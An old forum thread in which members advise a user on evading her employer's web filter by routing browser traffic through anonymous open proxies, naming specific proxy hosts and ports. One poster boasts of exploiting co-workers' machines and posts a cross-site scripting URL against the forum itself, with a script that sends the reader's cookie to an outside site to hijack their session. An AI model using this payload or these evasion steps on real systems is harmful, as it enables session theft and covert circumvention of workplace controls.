OK all you software guru's.......

[EX#996]

The internet Natzi's at work decided to block all non-financial internet sites at work.   ::)  I know this is a software program and is not hardware related.  Any ideas on how to get around it?

Dawn   ???

[ecumike]

Dawn, what happens is your computer requests a URL, then the edge servers/firewall software checks it against a list and either passes that request onto the next router outside your CO.s or it returns some sort of "sorry, this URL has been blocked" message.

That's what happens here when you try and goto playboy.com (so I hear), they route your request to an internal server that load the "dude you're stupid for trying to look at this stuff at work" message.

I'll send you some tricks tomorrow to try and get around it.

But remember, you don't know where they came from  ;)

[sdiver68]

I say bribe that LAN administrator :)

[EX#996]

Dawn, what happens is your computer requests a URL, then the edge servers/firewall software checks it against a list and either passes that request onto the next router outside your CO.s or it returns some sort of "sorry, this URL has been blocked" message.

That's what happens here when you try and goto playboy.com (so I hear), they route your request to an internal server that load the "dude you're stupid for trying to look at this stuff at work" message.

I'll send you some tricks tomorrow to try and get around it.

But remember, you don't know where they came from  ;)

That is exactly what it does.  I work 10 hour days in a call center.  This board is one of the ways I keep my sanity.  Any help would be appreciated.

If any one asks....

<Sgt Schultz's voice>  I know NOTHING!

Dawn   :)

[ecumike]

OK my test worked, I was able to access the above 'blocked' site from our CO.s network.

You have to install this small program on your computer though... can you do that at work?... can you get email w/ attachments at work?

How it works is that you are actually sending your request through a remote proxy server, and not your network's proxy server. Hence you bypass it. You can make look like you are coming from ANY country in (edited rest)... umm... maybe I shouldn't be posting this kinda info on a public forum.  Let me know.

[EX#996]

Send it to my home e-mail address.  I will down load it to a disc.  Plus, no evidence through my work e-mail.

Thanks!

buxton@frontiernet.net

Dawn   :)

[ecumike]

You've got mail. 8)
Actually Dawn you don't need special software, you can do it right from your broswer. I just sent a second email with the 411

[OmniGLH]

Hey Michael...

This sounds interesting.  Keep explaining how it works!

...or just send me a copy in my email and I'll figure it out myself  ;)

jptak@dls.net

[ecumike]

Basically, what this does, is it sends your request to the remote proxy server that you specify. THAT remote server goes and requests the URL that you want and returns the info/site to you... kinda like a middle man/concierge/go getter, etc... aka/used for {insert h8ck3r term here}

Where do you 'find' these remote anonymous open proxy servers to go through? well... the story ends here...  :-X  Let's just say you use the big library in the sky. ;)

[ecumike]

OK you asked for it.. here goes...

You goto/request a Web site in your browser.
When you request www.yahoo.com, your browser, by default, is communicating on port 80 (the default port # for the HTTP protocol - think of it like a channel). It's saying... "talk through port 80 and find me the server named yahoo.com" and by default, yahoo's Web server is going to be speaking on port 80 also so it will hear your request and send you info.

Well your company is/could be listening for all traffic on that port, which is HTTP traffic, or 'requested Web sites'. So they know what you're doing and where you're going every time you click.

Through the multitude of software available, they can trap, filter, cache, monitor, bounce, log, etc... any and all Web page requests from all computers.... Unless of course you 'communicate' on a different port. (which they're not expecting)

So instead of communicating on the default port (80), you find an anonymous, open, HTTP proxy server, which has it's own, different port for communication. This proxy server 'translates' your request from it's 'special' port to the common port (80) for you.

Example: Say there's a proxy server - bpubl014.hgo.se - and the port is set to 3128.
You set/change your browser's HTTP proxy setting to that IP/server, and that port #.

Now when you request www.yahoo.com, you browser is going to send the request to bpubl014.hgo.se - AND - it's gonna do it on port 3128 instead of port 80. When the proxy server gets your request, it goes and gets your requested URL for you, but on PORT 80, b/c that's what all Web sites 'talk' on by default. It then receives the info from that site you requested, and sends it back to you on PORT 3128.

You've now just used a channel that is not being monitored (hopefully) and bypassed big bro. who's monitoring and filtering traffic on PORT 80. :)

In IE, goto on the menu: TOOLS/...INTERNET OPTIONS/...CONNECTIONS. Then if you're on a LAN, select LAN SETTINGS at the bottom. If you're on Dialup, select the appropriate connection in the list, and then 'SETTINGS'

There's a section in there for PROXY SERVER.. click on 'advanced' and change the HTTP fields to your remote proxy server that you 'found'.

Also.. this changes your IP address that gets sent to the Web site that you goto (aka IP spoofing). And yea, there are servers ALL over the world.

Jack's got some proof of me spoofing my info in his Web site stats log ;)

Also again, you will NOT be able to access any internal company sites (intranets), b/c you are bypassing your CO.s firewall/software/servers that route or keep internal requests inside the network

Have fun.

[ecumike]

If you want to make a trip around the world and see just how fast the internet is for those guys in Japan. pop this one in..  211.7.65.225:80

Results from privay.net:
Hello!   Your IP address is 211.7.65.225
Your computer host name is dns.lpgc.or.jp

[spyderchick]

ecumike, you must subscribe to 2600.  :D I love that 'zine.

[ecumike]

Awe shlt, we have a 26er in the house!!!

Spyder, why do you read that 'mag'?  What do you do for work?

[sdiver68]

What if your company has ports other than the common ones blocked?  i.e. HTTP, FTP, etc...  then the whole scheme does not work, no?

Also, what happens when the LAN administrator notices a surge in traffic on port 3128?

Not that theyn would typically look for that  :-/

[spyderchick]

Awe shlt, we have a 26er in the house!!!

Spyder, why do you read that 'mag'?  What do you do for work?

Why do I read it? Hmmm. Aw shucks, I dunno.  Maybe cuz, wait...why do You read it?  :P
Actually, I just dabble.

What do I do for work? WHAT DO I DO FOR WORK?  ;D

I'm your friendly neighborhood leather repair chick, of course.  

[ecumike]

Well, if your employer is REAL tight and the LAN dudes are some of those control freaks, then sure if they also monitor, port 8080, 20, 21, etc.. then yea, you data stream will get picked up by the filter.

But remember... PORT 80 is the default.. they really have no reason to monitor any other port for HTTP traffic, it would just be a crap shoot... there are thousands of PORT.

3128 is an open/non-used port, as is 8080 and ANY port #s not listed below..
7
9
11
13
17
19
20
21
23
25
37
39
42
43
53
67
68
69
70
79
80
88
101
102
107
109
110
111
113
117
119
123
135
137
138
139
143
158
161
162
170
179
194
213
389
443
445
464
500
512
513
513
514
515
517
518
520
525
526
530
531
532
533
540
543
544
550
556
560
561
666
749
750
1109
1167
1433
1434
1434
1512
1524
1701
1723
1812
1813
2049
2053
9535

If don't see a number listed above, you can make it up and use it as a port #... so ya see.. there are too many to filter them all. Also... the ports above are USED by other protocols and programs, it would take a significant amount of server to log/filter all those.

Suppose your CO. blocks Limewire so that employees aren't sucking up bandwith to share and download MP3s. How do they do that?.. They can block the default port that LimeWire uses.. 6344. So what can you do?  Being a smart user, change the port # in the program.

You can make/create/use almost ANY number up to 5 digits. (I think..it's been a few years since I got my MCSE)
So like you could set it to 10443 if you want.

But yea, you're at the 'mercy' of the port that the proxy server that you find uses. If you're admin HAPPENS to block that port.. then just find another server that uses a different port.

[ecumike]

Why do I read it? Hmmm. Aw shucks, I dunno.  Maybe cuz, wait...why do You read it?  :P
Actually, I just dabble.

What do I do for work? WHAT DO I DO FOR WORK?  ;D

I'm your friendly neighborhood leather repair chick, of course.  

I read it:
A. B/C it really opens your eyes to what people can and are doing through computers
B. It makes you a less naive person when it comes to those sorts things ("oh you can do that?")
C. I'm a Web developer and keep up on the latest and greatest hacks and tricks

OK the real reasons...
A. I like to screw with people/co-workers on the LAN who have vulnerabilities on their systems
B. I like to exploit viruses of those such people and see what I can actually do with their computer
C. It's cool shlt to read about, there's some smart mofo.s out there

Yes, I knew you did leather work.. just didn't know if there was some other work that you did that you read it for.

[ecumike]

Want to see a prime example...

A cross-site scripting vulneralbility on this here board...
CLICK HERE

Or how's about this...
CLICK HERE

Not to scare anyone, b/c it doesn't EXACTLY work buuuutttt...
This one could send your Cookie info to my site, where it would get tagged in the Web stats log. I could then look it up, and when goto this site (CCS BBS), I could send out YOUR cookie ID instead of mine, and then I'd be logged in as you.

This one isn't working b/c the BBS is not escaping the characters, but here WAS the example...

http://www.racemotorcycles.com/cgi-bin/board/YaBB.pl?board=ccs1;action=display;num=<Script>location%3d'http://santelia.org/index.shtml?Cookie%3d'%2b(document.Cracker)%3b</Script>



OK I'm done playing. :)

[spyderchick]

Oh Mike, you are such a fart smeller! Gotta love computer "magic".

Yeah, 2600 is fun and informative.  More people should read it. No, I'm not an IT person, but like you, it's good to be informed about the bigger wider world out there. How many people know who Kevin Mitnick is, and would they care?

[ecumike]

And would you know that he was caught just 15 minutes down the road from where I live.?

[spyderchick]

There's a little bit of Kevin in all of us.